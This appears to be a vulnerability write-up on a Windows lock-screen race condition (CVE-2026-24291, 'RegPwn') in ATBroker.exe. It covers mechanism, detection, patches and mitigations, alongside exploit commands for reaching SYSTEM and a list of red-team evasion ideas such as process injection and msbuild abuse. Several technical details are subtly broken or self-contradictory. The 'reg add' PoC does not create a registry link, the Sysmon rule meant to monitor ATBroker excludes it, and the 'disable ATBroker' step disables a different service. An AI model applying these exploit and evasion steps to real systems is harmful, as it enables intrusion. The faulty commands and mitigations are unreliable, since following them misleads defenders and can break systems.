Inside RegPwn (CVE‑2026‑24291): How a Simple Lock‑Screen Race Condition Grants SYSTEM Access

Vulnerability Overview

CVE‑2026‑24291 (RegPwn) is a high‑severity local privilege‑escalation flaw discovered by MDSec and disclosed in March 2026. It resides in the Windows accessibility infrastructure, specifically the ATBroker.exe service, which runs as SYSTEM and communicates with user‑level registry keys via the ATConfig mechanism.

Technical Mechanism

Affected Components

ATBroker.exe (Assistive Technology Broker) runs with SYSTEM privileges and reads configuration from

HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Accessibility

, then writes to system‑level keys under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.

Root Cause

The flaw is a logic‑level race condition: when a user locks the workstation (Win+L), ATBroker synchronizes ATConfig settings to the system registry. If an attacker pre‑creates a registry symbolic link ( REG_LINK) under HKCU that points to a protected HKLM service key, ATBroker follows the link and writes with SYSTEM rights, effectively hijacking the target service configuration.

CWE Classification

CWE‑362: Race Condition – exploitation of the lock‑screen transition window.

CWE‑59: Improper Link Following – lack of validation for registry symbolic links.

CWE‑732: Incorrect Permission Assignment – ambiguous trust boundary between HKCU and HKLM.

Exploit Demonstration

The public PoC follows three main steps:

Check environment

# Confirm current user
whoami
# Output: DESKTOP-XXXX\User

Create symbolic link (low‑privilege)

reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig" /ve /d "\??\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Services\msiserver" /f

Trigger the race condition rundll32.exe user32.dll,LockWorkStation Verify escalation

whoami
# Output: NT AUTHORITY\SYSTEM

After escalation, an attacker can disable security software, install persistence backdoors, move laterally, or exfiltrate credentials such as LSASS hashes.

Impact

Affected Versions

Windows 11 22H2, 23H2, 24H2 – patched with KB5077181 (or later).

Windows 10 21H2, Enterprise LTSC – patched.

Windows Server 2016, 2019, 2022, 2025 – patched.

Typical Attack Scenarios

Post‑compromise lateral movement: red team gains a low‑privilege RDP session and uses RegPwn to reach SYSTEM within seconds.

Physical access: brief contact with an unlocked workstation allows rapid privilege gain.

Malware persistence: infected devices repeatedly trigger the exploit to maintain high‑privilege footholds.

Disclosure Timeline & Public Exploits

Dec 2025 – MDSec reports the issue to Microsoft.

Feb 2026 – Microsoft acknowledges and begins patch development.

10 Mar 2026 – Out‑of‑band security update released (KB5077181, KB5075897, KB5075899).

Mid‑Mar 2026 – PoC source published on GitHub.

Late Mar 2026 – Integration into Brute Ratel C4 as a BOF module.

Public PoCs include a pure C implementation on GitHub (lennertdefauw/CVE‑2026‑24291), a Brute Ratel BOF module, and a Metasploit module post/windows/escalate/regpwn.

Detection & Forensics

Windows Event Monitoring

4657 (Security) – registry value changes under HKLM\SYSTEM\CurrentControlSet\Services.

4688 (Security) – new processes with SYSTEM parent (e.g., cmd.exe, powershell.exe).

4670 (Security) – ACL modifications on registry keys.

7036 (Service Control Manager) – unexpected service state changes.

1001 (Application) – ATBroker crashes in Windows Error Reporting.

Sysmon Rules (escaped XML)

<!-- Monitor ATBroker process tree -->
<RuleGroup name="" groupRelation="or">
  <ProcessCreate onmatch="exclude">
    <Image condition="is">C:\Windows\System32\ATBroker.exe</Image>
  </ProcessCreate>
</RuleGroup>

<!-- Monitor HKLM registry writes -->
<RuleGroup name="" groupRelation="or">
  <RegistryEvent onmatch="include">
    <TargetObject condition="contains">\SYSTEM\CurrentControlSet\Services\</TargetObject>
  </RegistryEvent>
</RuleGroup>

Indicators of Compromise

Creation of a REG_LINK under HKCU\...\ATConfig pointing to HKLM services.

ATBroker.exe spawning child processes (reg.exe, powershell.exe) shortly after lock‑screen.

Modification of ImagePath for services such as msiserver to non‑standard locations.

Outbound C2 connections shortly after escalation.

Mitigation

Official Patches

Windows 11 24H2 – install KB5077181 or later.

Windows 11 23H2/22H2 – install KB5075897.

Windows Server 2025 24H2 – install KB5075899.

Windows Server 2022 – install KB5075897.

Temporary Mitigations (if patch cannot be applied)

Disable the Assistive Technology Broker service:

# Disable ATBroker
sc config "BrokerInfrastructure" start= disabled
net stop "BrokerInfrastructure"

Restrict write permissions on HKCU\...\ATConfig:

# Apply restrictive ACL
regini.exe system.ini

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Accessibility\ATConfig = "D:P(A;;GA;;;SY)(A;;GR;;;BU)(A;;GR;;;IU)"

Force UAC to always prompt on the secure desktop:

# Set ConsentPromptBehaviorAdmin to 2
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name "ConsentPromptBehaviorAdmin" -Value 2

Deploy AppLocker or WDAC rules to block unsigned executables from temporary locations.

Red‑Team Bypass Ideas

Inject payload into a trusted process (e.g., notepad.exe) to avoid file‑based detection.

Use signed system binaries like msbuild.exe to load malicious configuration when AppLocker blocks custom executables.

Replace symbolic links with junctions if SeCreateSymbolicLinkPrivilege is available.

Simulate the lock‑screen transition via SendMessage/SendInput APIs when direct locking is restricted.

Red‑Team Value & Defender Recommendations

Why Attackers Favor RegPwn

High stability – logic‑based, rarely triggers BSODs.

Stealth – no driver loading or obvious registry tampering.

Broad compatibility across Windows 10, 11, and Server 2016‑2025.

Easy to evade AV – pure user‑mode operations.

Defender Guidance

Prioritize deployment of the KB patches within 72 hours.

Configure EDR/XDR alerts for abnormal ATBroker.exe process trees.

Apply least‑privilege ACLs to HKLM\SYSTEM\CurrentControlSet\Services\ for standard users.

Regularly audit registry ACLs using Get-Acl or RegDACL.

Run the public PoC in a lab environment to validate detection rules.

Conclusion

CVE‑2026‑24291 (RegPwn) illustrates a dangerous class of logic flaws where accessibility services unintentionally trust user‑controlled registry data, allowing a trivial race condition to elevate a standard account to SYSTEM. Understanding this mechanism enables defenders to craft precise detection (monitoring ATBroker activity, registry symbolic link creation, and unexpected service modifications) and reinforces the need for strict privilege boundaries in system components.